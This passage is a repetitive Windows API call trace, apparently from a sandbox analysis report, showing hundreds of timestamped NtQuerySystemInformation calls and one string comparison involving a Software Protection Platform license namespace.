(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x20, ResultLength=0x0) [0233.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd50, Length=0x38, ResultLength=0x0) [0233.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbd0, Length=0x20, ResultLength=0x0) [0233.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db60, Length=0x20, ResultLength=0x0) [0233.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db60, Length=0x20, ResultLength=0x0) [0233.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de20, Length=0x50, ResultLength=0x0) [0233.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dda0, Length=0x28, ResultLength=0x0) [0233.366] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0233.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de20, Length=0x50, ResultLength=0x0) [0233.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de20, Length=0x50, ResultLength=0x0) [0233.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de20, Length=0x50, ResultLength=0x0) [0233.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd50, Length=0x38, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db80, Length=0x28, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db80, Length=0x28, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db80, Length=0x28, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x28, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd50, Length=0x38, ResultLength=0x0) [0233.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc70, Length=0x28, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc70, Length=0x28, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd50, Length=0x38, ResultLength=0x0) [0233.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbd0, Length=0x20, ResultLength=0x0) [0233.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x20, ResultLength=0x0) [0233.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x20, ResultLength=0x0) [0233.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x20, ResultLength=0x0) [0233.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd50, Length=0x38, ResultLength=0x0) [0233.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbd0, Length=0x20, ResultLength=0x0) [0233.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db60, Length=0x20, ResultLength=0x0) [0233.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db60, Length=0x20, ResultLength=0x0) [0233.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x50, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x50, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x50, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d950, Length=0x50, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d950, Length=0x50, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d950, Length=0x50, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d950, Length=0x50, ResultLength=0x0) [0233.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x38, ResultLength=0x0) [0233.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x28, ResultLength=0x0) [0233.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x28, ResultLength=0x0) [0233.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x28, ResultLength=0x0) [0233.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x28, ResultLength=0x0) [0233.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d720, Length=0x28, ResultLength=0x0) [0233.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x38, ResultLength=0x0) [0233.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7a0, Length=0x28, ResultLength=0x0) [0233.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7a0, Length=0x28, ResultLength=0x0) [0233.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d640, Length=0x20, ResultLength=0x0) [0233.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d5c0, Length=0x20, ResultLength=0x0) [0233.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d5c0, Length=0x20, ResultLength=0x0) [0233.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d5c0, Length=0x20, ResultLength=0x0) [0233.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x38, ResultLength=0x0) [0233.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x38, ResultLength=0x0) [0233.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d700, Length=0x20, ResultLength=0x0) [0233.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d690, Length=0x20, ResultLength=0x0) [0233.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d690, Length=0x20, ResultLength=0x0) [0233.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x50, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x50, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x50, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d950, Length=0x50, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d950, Length=0x50, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d950, Length=0x50, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d950, Length=0x50, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x38, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x28, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x28, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x28, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x28, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d720, Length=0x28, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x38, ResultLength=0x0) [0233.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7a0, Length=0x28, ResultLength=0x0) [0233.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7a0, Length=0x28, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d640, Length=0x20, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d5c0, Length=0x20, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d5c0, Length=0x20, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d5c0, Length=0x20, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x38, ResultLength=0x0) [0233.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x38, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d700, Length=0x20, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d690, Length=0x20, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d690, Length=0x20, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e020, Length=0x28, ResultLength=0x0) [0233.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df68, Length=0x28, ResultLength=0x0) [0233.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df68, Length=0x28, ResultLength=0x0) [0233.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df68, Length=0x28, ResultLength=0x0) [0233.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df68, Length=0x28, ResultLength=0x0) [0233.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df68, Length=0x28, ResultLength=0x0) [0233.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df68, Length=0x28, ResultLength=0x0) [0233.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df68, Length=0x28, ResultLength=0x0) [0233.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ded0, Length=0x20, ResultLength=0x0) [0233.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ded0, Length=0x20, ResultLength=0x0) [0233.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df68, Length=0x28, ResultLength=0x0) [0233.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x40, ResultLength=0x0) [0233.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x40, ResultLength=0x0) [0233.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd90, 